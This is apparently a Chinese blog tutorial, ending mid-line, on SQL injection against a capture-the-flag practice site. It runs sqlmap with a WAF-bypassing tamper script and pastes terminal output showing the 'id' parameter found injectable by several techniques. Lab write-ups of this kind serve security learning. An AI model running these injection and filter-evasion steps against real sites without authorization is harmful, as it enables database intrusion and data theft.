分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow
也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!
这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF
空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等
流程和简单的sql注入之3是一样的,不过加了–tamper而已
就不截图了,以下是我从KALI的终端上复制的
这里用的level参数是执行测试的等级(1-5,默认为1)
sqlmap默认测试所有的GET和POST参数,当–level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。
root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” –level 2
_
_ | | _ _ {1.0-dev-nongit-201608240a89}
|_ -| . | | | .’| . |
|| |||||,| _|
|| || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:16:47
[21:16:47] [INFO] loading tamper script ‘space2comment’
[21:16:47] [INFO] testing connection to the target URL
[21:16:47] [INFO] heuristics detected web page charset ‘GB2312’
[21:16:47] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:16:47] [INFO] testing if the target URL is stable
[21:16:48] [INFO] target URL is stable
[21:16:48] [INFO] testing if GET parameter ‘id’ is dynamic
[21:16:48] [INFO] confirming that GET parameter ‘id’ is dynamic
[21:16:48] [INFO] GET parameter ‘id’ is dynamic
[21:16:48] [INFO] heuristic (basic) test shows that GET parameter ‘id’ might be injectable (possible DBMS: ‘MySQL’)
[21:16:48] [INFO] heuristic (XSS) test shows that GET parameter ‘id’ might be vulnerable to XSS attacks
[21:16:48] [INFO] testing for SQL injection on GET parameter ‘id’
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (2) and risk (1) values? [Y/n] y
[21:16:54] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause’
[21:16:54] [WARNING] reflective value(s) found and filtering out
[21:16:55] [INFO] GET parameter ‘id’ seems to be ‘AND boolean-based blind - WHERE or HAVING clause’ injectable
[21:16:55] [INFO] testing ‘MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause’
[21:16:55] [INFO] GET parameter ‘id’ is ‘MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause’ injectable
[21:16:55] [INFO] testing ‘MySQL inline queries’
[21:16:55] [INFO] testing ‘MySQL > 5.0.11 stacked queries (SELECT - comment)’
[21:16:55] [WARNING] time-based comparison requires larger statistical model, please wait……..
[21:16:55] [INFO] testing ‘MySQL > 5.0.11 stacked queries (SELECT)’
[21:16:55] [INFO] testing ‘MySQL > 5.0.11 stacked queries (comment)’
[21:16:55] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[21:16:55] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query - comment)’
[21:16:55] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query)’
[21:16:56] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (SELECT)’
[21:17:06] [INFO] GET parameter ‘id’ seems to be ‘MySQL >= 5.0.12 AND time-based blind (SELECT)’ injectable
[21:17:06] [INFO] testing ‘Generic UNION query (NULL) - 1 to 20 columns’
[21:17:06] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:17:07] [INFO] testing ‘Generic UNION query (NULL) - 22 to 40 columns’
[21:17:09] [INFO] testing ‘MySQL UNION query (NULL) - 1 to 20 columns’
[21:17:09] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:17:09] [INFO] target URL appears to have 1 column in query
[21:17:10] [WARNING] if UNION based SQL injection is not d